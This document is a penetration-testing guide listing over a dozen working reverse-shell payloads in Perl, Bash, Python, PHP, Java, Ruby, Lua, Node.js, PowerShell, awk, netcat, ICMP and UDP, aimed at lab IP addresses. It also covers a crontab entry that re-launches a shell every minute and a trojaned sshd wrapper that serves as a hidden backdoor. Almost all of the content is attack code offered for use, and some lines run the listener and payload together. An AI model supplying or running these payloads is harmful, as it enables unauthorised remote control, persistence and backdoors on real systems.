Mastering Reverse Shells: 30+ Techniques Across Linux, Windows, and Network Protocols

Introduction

When a penetration test requires an interactive shell on a target, transferring external tools can be risky or impossible; leveraging the target's native utilities and language runtimes often yields a cleaner solution. This guide enumerates dozens of reverse‑shell payloads that use built‑in tools across Linux and Windows.

Target Environment Overview

win7          192.168.1.128
centos6.8    192.168.1.129
win2008R2    192.168.1.131
kali          192.168.1.147

Linux Reverse‑Shell Techniques

Perl socket – Most Linux distributions ship Perl; the one‑liner opens a TCP socket and execs an interactive Bash.

C:\>nc -lvp 53# perl -e 'use Socket;$i="192.168.1.128";$p=53;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

/dev/tcp – Bash can write to the special device file to forward I/O.

C:\>nc -lvp 80# /bin/bash -i >& /dev/tcp/192.168.1.128/80 0>&1

SSH daemon binding – Bind sshd to a local port and connect to it.

# netstat -tulnp | grep "8080"
# ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=8080;
# ssh [email protected] -p 8080
# pkill su

Socat – Forward STDIO over TCP.

# cd /usr/sbin/
# mv sshd ../bin/
# echo '#!/usr/bin/perl' >sshd
# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
# chmod u+x sshd
# /etc/init.d/sshd restart
# socat STDIO TCP4:192.168.1.129:22,sourceport=13377

Netcat with FIFO – Use mkfifo to pipe data when the traditional -e option is unavailable.

C:\>nc -lvp 8080# rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.128 8080 >/tmp/f

Cryptcat – Encrypted netcat with password support.

# cryptcat -vv -l -p 25 -k sec
# cryptcat -vv -l -p 80 -k sec
# cryptcat 192.168.1.129 80 -k sec|cmd.exe|cryptcat 192.168.1.129 25 -k sec

Awk – Loop over a TCP socket and execute received commands.

# awk 'BEGIN{s="/inet/tcp/0/192.168.1.128/8080";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

Python socket – One‑liner that duplicates file descriptors and spawns Bash.

C:\>nc -lvp 8080# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.128",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"]);'

Crontab persistence – Schedule a reverse‑shell command to run every minute.

# (crontab -l; printf "* * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.128\",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'
") | crontab -
# crontab -e

PHP socket – Useful on compromised web servers.

/usr/local/php/bin/php -r '$sock=fsockopen("192.168.1.128",8080);exec("/bin/bash -i <&3 >&3 2>&3");'

Java reverse shell – Compile a JAR that opens a TCP socket.

public class Revs {
    public static void main(String[] args) throws Exception {
        Runtime r = Runtime.getRuntime();
        String[] cmd = {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.1.128/8080;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

Ruby socket

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.128","8080");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read};end'

Lua socket

lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.1.128','8080');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Node.js

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "10.17.26.64", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/;
})();

Windows Reverse‑Shell Techniques

PowerShell – Bypass execution policy and import a reverse‑shell script.

powershell -exec bypass -Command "& {Import-Module 'C:\mini-reverse.ps1'}"

Powercat – PowerShell implementation of netcat.

Set-ExecutionPolicy Unrestricted
cd .\powercat
Import-Module .\powercat.ps1
powercat -c 192.168.1.128 -p 8080 -e cmd -g >> payload.ps1
nc -lvp 8080
powershell -exec bypass -Command "& {Import-Module 'C:\payload.ps1'}"

Other Windows‑specific payloads (VBS, C reverse shell, etc.) follow the same pattern of opening a TCP socket and redirecting STDIO.

Protocol‑Specific Shells

ICMP tunneling – Compile ishd and ish to encapsulate traffic in ICMP packets, useful for bypassing strict firewalls.

# make linux
./ishd -i 6555 -t 0 -p 8080
./ish -i 6555 -t 0 -p 8080 192.168.1.129

UDP reverse shell

nc -l -p 53 -u
python udpshell.py 192.168.1.128 53 udp

DNS tunneling – Not detailed here, but references tools like Cobalt Strike for advanced DNS‑based shells.

Conclusion

All these methods share the core idea of establishing a socket between attacker and target; firewalls may force the use of lower‑level protocols or port‑reusing tricks. While many of these payloads are suitable only for quick, temporary use, understanding them deepens knowledge of system internals and helps craft more robust, stealthy post‑exploitation tools.